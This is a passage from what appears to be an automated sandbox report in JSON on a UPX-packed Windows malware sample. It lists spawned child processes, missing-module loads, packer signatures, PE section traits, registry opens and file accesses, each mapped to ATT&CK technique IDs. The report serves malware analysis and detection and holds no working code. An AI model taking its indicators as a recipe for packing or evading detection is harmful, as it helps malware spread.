\"dtdld.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tjjhnh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tjjhnh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"brpvfll.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"brpvfll.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"240248.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"240248.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"20468.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"20468.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jjjhv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jjjhv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jfnlx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jfnlx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rdrhhx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rdrhhx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"bdxfltt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"bdxfltt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"djhpdbh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"djhpdbh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vxjvbn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vxjvbn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pnxhn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pnxhn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4202648.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4202648.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rhxdb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rhxdb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"426882.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"426882.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dpdrtr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dpdrtr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rpnxll.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rpnxll.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"848084.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"848084.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"802262.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"802262.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"048424.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"048424.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"24680.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"2428202.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"00062.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"njhfl.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"66840.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"60064.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"2288488.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"48866.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"xbxthhr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"fhhxhtt.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"648042.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"80004.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"08446.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"28848.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"8240402.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"802848.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"4404864.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"dbhbvhd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"xfllptv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"pppjrfj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"tjtvdt.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"428848.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"dtdld.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000\n \"bpxbh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 759F0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"24680.exe\" (UID: 00000000-00003744)\n Spawned process \"2428202.exe\" (UID: 00000000-00005964)\n Spawned process \"00062.exe\" (UID: 00000000-00005896)\n Spawned process \"njhfl.exe\" (UID: 00000000-00004296)\n Spawned process \"66840.exe\" (UID: 00000000-00004244)\n Spawned process \"60064.exe\" (UID: 00000000-00004340)\n Spawned process \"2288488.exe\" (UID: 00000000-00006120)\n Spawned process \"48866.exe\" (UID: 00000000-00004236)\n Spawned process \"xbxthhr.exe\" (UID: 00000000-00005860)\n Spawned process \"fhhxhtt.exe\" (UID: 00000000-00004460)\n Spawned process \"648042.exe\" (UID: 00000000-00003968)\n Spawned process \"80004.exe\" (UID: 00000000-00004168)\n Spawned process \"08446.exe\" (UID: 00000000-00004488)\n Spawned process \"28848.exe\" (UID: 00000000-00000692)\n Spawned process \"8240402.exe\" (UID: 00000000-00003564)\n Spawned process \"802848.exe\" (UID: 00000000-00003980)\n Spawned process \"4404864.exe\" (UID: 00000000-00003628)\n Spawned process \"dbhbvhd.exe\" (UID: 00000000-00004092)\n Spawned process \"xfllptv.exe\" (UID: 00000000-00003276)\n Spawned process \"pppjrfj.exe\" (UID: 00000000-00002472)\n Spawned process \"tjtvdt.exe\" (UID: 00000000-00002700)\n Spawned process \"428848.exe\" (UID: 00000000-00002420)\n Spawned process \"dtdld.exe\" (UID: 00000000-00004568)\n Spawned process \"bpxbh.exe\" (UID: 00000000-00003944)\n Spawned process \"tjjhnh.exe\" (UID: 00000000-00004492)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"24680.exe\" (UID: 00000000-00003744)\n Spawned process \"2428202.exe\" (UID: 00000000-00005964)\n Spawned process \"00062.exe\" (UID: 00000000-00005896)\n Spawned process \"njhfl.exe\" (UID: 00000000-00004296)\n Spawned process \"66840.exe\" (UID: 00000000-00004244)\n Spawned process \"60064.exe\" (UID: 00000000-00004340)\n Spawned process \"2288488.exe\" (UID: 00000000-00006120)\n Spawned process \"48866.exe\" (UID: 00000000-00004236)\n Spawned process \"xbxthhr.exe\" (UID: 00000000-00005860)\n Spawned process \"fhhxhtt.exe\" (UID: 00000000-00004460)\n Spawned process \"648042.exe\" (UID: 00000000-00003968)\n Spawned process \"80004.exe\" (UID: 00000000-00004168)\n Spawned process \"08446.exe\" (UID: 00000000-00004488)\n Spawned process \"28848.exe\" (UID: 00000000-00000692)\n Spawned process \"8240402.exe\" (UID: 00000000-00003564)\n Spawned process \"802848.exe\" (UID: 00000000-00003980)\n Spawned process \"4404864.exe\" (UID: 00000000-00003628)\n Spawned process \"dbhbvhd.exe\" (UID: 00000000-00004092)\n Spawned process \"xfllptv.exe\" (UID: 00000000-00003276)\n Spawned process \"pppjrfj.exe\" (UID: 00000000-00002472)\n Spawned process \"tjtvdt.exe\" (UID: 00000000-00002700)\n Spawned process \"428848.exe\" (UID: 00000000-00002420)\n Spawned process \"dtdld.exe\" (UID: 00000000-00004568)\n Spawned process \"bpxbh.exe\" (UID: 00000000-00003944)\n Spawned process \"tjjhnh.exe\" (UID: 00000000-00004492)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa\" was detected as \"UPX\" and name: \"Packer\"\n \"pltvbn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"npdthpv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"dhtjtp.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"nfrbnh.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"00068.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"840262.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4880662.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"28028.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"040202.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rtbxtx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"0228228.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"080844.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"046220.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"86682.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4042804.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"048424.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"802262.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"848084.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"0406488.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"vlhdl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rpnxll.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rrhrlx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"dpdrtr.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"224404.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f40377@RPCRT4.dll\"\n \"15001600c03e036b@ADVAPI32.dll\"\n \"0e000f00703f036b@ADVAPI32.dll\"\n \"0e000f00cc3f036b@ADVAPI32.dll\"\n \"11001200b447036b@ADVAPI32.dll\"\n \"110012004848036b@ADVAPI32.dll\"\n \"120013008c48036b@ADVAPI32.dll\"\n \"12001300e448036b@ADVAPI32.dll\"\n \"14001500386e036b@ADVAPI32.dll\"\n \"14001500506e036b@ADVAPI32.dll\"\n \"14001500686e036b@ADVAPI32.dll\"\n \"17001800806e036b@ADVAPI32.dll\"\n \"0d000e00986e036b@ADVAPI32.dll\"\n \"11001200a86e036b@ADVAPI32.dll\"\n \"11001200bc6e036b@ADVAPI32.dll\"\n \"0f001000fc6f036b@ADVAPI32.dll\"\n \"140015003c70036b@ADVAPI32.dll\"\n \"140015005470036b@ADVAPI32.dll\"\n \"0c000d009c70036b@ADVAPI32.dll\"\n \"0c000d00ac70036b@ADVAPI32.dll\"\n \"0e000f00bc70036b@ADVAPI32.dll\"\n \"0e000f00cc70036b@ADVAPI32.dll\"\n \"0b000c00dc70036b@ADVAPI32.dll\"\n \"180019001473036b@RPCRT4.dll\"\n \"130014004073036b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"brpvfll.exe\" called \"CreateProcessA\" with parameter \"c:\\240248.exe\" - (UID: 00000000-00002416)\n \"dpdrtr.exe\" called \"CreateProcessA\" with parameter \"c:\\rrhrlx.exe\" - (UID: 00000000-00003976)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa\" has an writable section named \"UPX0\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa\" has an writable section named \"UPX1\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa\" has an writable section named \"UPX2\"\n \"pltvbn.exe\" has an writable section named \"UPX0\"\n \"pltvbn.exe\" has an writable section named \"UPX1\"\n \"pltvbn.exe\" has an writable section named \"UPX2\"\n \"npdthpv.exe\" has an writable section named \"UPX0\"\n \"npdthpv.exe\" has an writable section named \"UPX1\"\n \"npdthpv.exe\" has an writable section named \"UPX2\"\n \"dhtjtp.exe\" has an writable section named \"UPX0\"\n \"dhtjtp.exe\" has an writable section named \"UPX1\"\n \"dhtjtp.exe\" has an writable section named \"UPX2\"\n \"nfrbnh.exe\" has an writable section named \"UPX0\"\n \"nfrbnh.exe\" has an writable section named \"UPX1\"\n \"nfrbnh.exe\" has an writable section named \"UPX2\"\n \"00068.exe\" has an writable section named \"UPX0\"\n \"00068.exe\" has an writable section named \"UPX1\"\n \"00068.exe\" has an writable section named \"UPX2\"\n \"840262.exe\" has an writable section named \"UPX0\"\n \"840262.exe\" has an writable section named \"UPX1\"\n \"840262.exe\" has an writable section named \"UPX2\"\n \"4880662.exe\" has an writable section named \"UPX0\"\n \"4880662.exe\" has an writable section named \"UPX1\"\n \"4880662.exe\" has an writable section named \"UPX2\"\n \"28028.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa\" has an executable section named \"UPX0\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa\" has an executable section named \"UPX1\"\n \"pltvbn.exe\" has an executable section named \"UPX0\"\n \"pltvbn.exe\" has an executable section named \"UPX1\"\n \"npdthpv.exe\" has an executable section named \"UPX0\"\n \"npdthpv.exe\" has an executable section named \"UPX1\"\n \"dhtjtp.exe\" has an executable section named \"UPX0\"\n \"dhtjtp.exe\" has an executable section named \"UPX1\"\n \"nfrbnh.exe\" has an executable section named \"UPX0\"\n \"nfrbnh.exe\" has an executable section named \"UPX1\"\n \"00068.exe\" has an executable section named \"UPX0\"\n \"00068.exe\" has an executable section named \"UPX1\"\n \"840262.exe\" has an executable section named \"UPX0\"\n \"840262.exe\" has an executable section named \"UPX1\"\n \"4880662.exe\" has an executable section named \"UPX0\"\n \"4880662.exe\" has an executable section named \"UPX1\"\n \"28028.exe\" has an executable section named \"UPX0\"\n \"28028.exe\" has an executable section named \"UPX1\"\n \"040202.exe\" has an executable section named \"UPX0\"\n \"040202.exe\" has an executable section named \"UPX1\"\n \"rtbxtx.exe\" has an executable section named \"UPX0\"\n \"rtbxtx.exe\" has an executable section named \"UPX1\"\n \"0228228.exe\" has an executable section named \"UPX0\"\n \"0228228.exe\" has an executable section named \"UPX1\"\n \"080844.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"pltvbn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"npdthpv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"dhtjtp.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"nfrbnh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"00068.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"840262.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"4880662.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"28028.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"040202.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rtbxtx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"0228228.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"080844.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"046220.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"86682.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"4042804.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"048424.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"802262.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"848084.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"0406488.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"vlhdl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rpnxll.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rrhrlx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"dpdrtr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"224404.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"24680.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"24680.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"24680.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"24680.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"24680.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"24680.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" reads file \"c:\\c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" reads file \"c:\\24680.exe\"\n \"24680.exe\" reads file \"c:\\24680.exe\"\n \"24680.exe\" reads file \"c:\\2428202.exe\"\n \"2428202.exe\" reads file \"c:\\2428202.exe\"\n \"2428202.exe\" reads file \"c:\\00062.exe\"\n \"00062.exe\" reads file \"c:\\00062.exe\"\n \"00062.exe\" reads file \"c:\\njhfl.exe\"\n \"njhfl.exe\" reads file \"c:\\njhfl.exe\"\n \"njhfl.exe\" reads file \"c:\\66840.exe\"\n \"66840.exe\" reads file \"c:\\66840.exe\"\n \"66840.exe\" reads file \"c:\\60064.exe\"\n \"60064.exe\" reads file \"c:\\60064.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\24680.EXE\"; Key: \"\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\\APPCERTDLLS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n 